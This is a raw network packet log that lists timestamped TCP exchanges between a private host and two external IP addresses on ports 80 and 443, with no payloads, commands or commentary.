Nov 15, 2024 18:14:06.672764063 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672790051 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672790051 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672812939 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672821045 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672840118 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:06.672871113 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672871113 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:06.672888041 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:11.326414108 CET	80	49730	192.3.243.136	192.168.2.4
Nov 15, 2024 18:14:11.326533079 CET	49730	80	192.168.2.4	192.3.243.136
Nov 15, 2024 18:14:11.392247915 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:11.392303944 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:11.392389059 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:11.404192924 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:11.404222012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.296005964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.296084881 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.300076008 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.300100088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.300518990 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.318804979 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.359338999 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.487571955 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.487617016 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.487694979 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.487730980 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.487968922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.488032103 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.488044024 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.542293072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.604460955 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.604475021 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.604564905 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.604602098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.605262041 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.605328083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.605344057 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.605359077 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.605382919 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.606427908 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.606501102 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.606514931 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.651670933 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.720993996 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.721014977 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.721174955 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.721220016 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.721515894 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.721528053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.721592903 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.721613884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.722465038 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.722476006 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.722534895 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.722553015 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.723525047 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.723563910 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.723591089 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.723604918 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.723628998 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.724431992 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.724503994 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.724520922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.725410938 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.725483894 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.725502014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.725860119 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.725923061 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.725934982 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.776705027 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.837955952 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.837992907 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.838056087 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.838092089 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.838105917 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.838793993 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.838838100 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.838857889 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.838884115 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.838902950 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.839487076 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.839555025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.839570999 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.840379953 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.840460062 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.840476990 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.841175079 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.841242075 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.841257095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.842020988 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.842089891 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.842108965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.842920065 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.843008995 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.843024969 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.843900919 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.843981028 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.843997002 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.844506979 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.844572067 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.844587088 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.845369101 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.845434904 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.845453978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.845562935 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.845617056 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.845632076 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.846311092 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.846370935 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.846383095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.847006083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.847069025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.847081900 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.847820997 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.847904921 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.847923040 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.901665926 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.954932928 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.954962969 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.955039024 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.955074072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.955086946 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.955240011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.955251932 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.955305099 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.955329895 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.955735922 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.955795050 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.955811024 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.956751108 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.956820011 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.956835032 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.957690001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.957772017 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.957789898 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.957942009 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.958005905 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.958019018 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.958864927 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.958945990 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.958964109 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.959621906 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.959718943 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.959736109 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.960612059 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.960685968 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.960700035 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.960824966 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.960884094 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.960896015 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.961675882 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.961746931 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.961759090 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.962554932 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.962625980 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.962641001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.963187933 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.963259935 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.963272095 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.963387012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.963443995 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.963459969 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.964168072 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.964237928 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.964241982 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.964253902 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.964291096 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.965137959 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.965230942 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.965241909 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.965951920 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.965993881 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.966007948 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.966022968 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.966058016 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.966917992 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.966994047 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.967011929 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.967803001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.967871904 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.967885017 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.967899084 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.968137980 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.968808889 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.968871117 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.968884945 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.968898058 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.968936920 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.970176935 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.970216990 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.970261097 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.970283031 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.970307112 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.971040964 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.971110106 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.971126080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.998678923 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:12.998796940 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:12.998817921 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.042273998 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.071918011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.072005987 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.072031021 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.072633982 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.072710991 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.072731018 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.073096991 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.073159933 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.073178053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.073683023 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.073765993 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.073785067 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.074456930 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.074525118 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.074548006 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.074668884 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.074737072 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.074748993 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.075474024 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.075536966 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.075548887 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.075658083 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.075737953 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.075752020 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.076442003 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.076503992 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.076519966 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.077271938 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.077331066 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.077348948 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.077532053 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.077595949 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.077609062 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.078314066 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.078401089 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.078416109 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.078560114 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.078629017 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.078638077 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.079257965 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.079329014 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.079350948 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.080053091 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.080123901 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.080142021 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.080311060 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.080369949 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.080384970 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.080881119 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.080941916 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.080956936 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.081098080 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.081151962 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.081166983 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.081763983 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.081835985 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.081856012 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.081932068 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.081988096 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.082005978 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.082169056 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.082225084 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.082238913 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.082824945 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.082889080 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.082901001 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083041906 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083116055 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.083131075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083738089 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083801031 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.083807945 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083820105 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083875895 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.083885908 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.083930969 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.084634066 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.084698915 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.084714890 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.085100889 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.085159063 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.085167885 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.085184097 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.085222960 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.086226940 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.086287975 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.086337090 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.086358070 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.086385012 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.087099075 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.087157011 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.087167025 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.087197065 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.087218046 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.087876081 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.087939024 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.087954998 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.088221073 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.088285923 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.088300943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.088391066 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.088426113 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.088462114 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.088475943 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.088502884 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.089389086 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.089430094 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.089474916 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.089489937 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.089504957 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.090286016 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.090328932 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.090369940 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.090385914 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.090405941 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.091006994 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.091078997 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.091093063 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.091288090 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.091356039 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.091367006 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.091402054 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.091454029 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.091463089 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.092137098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.092205048 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.092220068 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.144867897 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.188661098 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.188817024 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.188896894 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.188966036 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.189050913 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.189090014 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.189418077 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.189502001 CET	49731	443	192.168.2.4	142.215.209.78
Nov 15, 2024 18:14:13.189527988 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.189860106 CET	443	49731	142.215.209.78	192.168.2.4
Nov 15, 2024 18:14:13.189939022 CET	49731	443	192.168.2.4	142.215.209.78
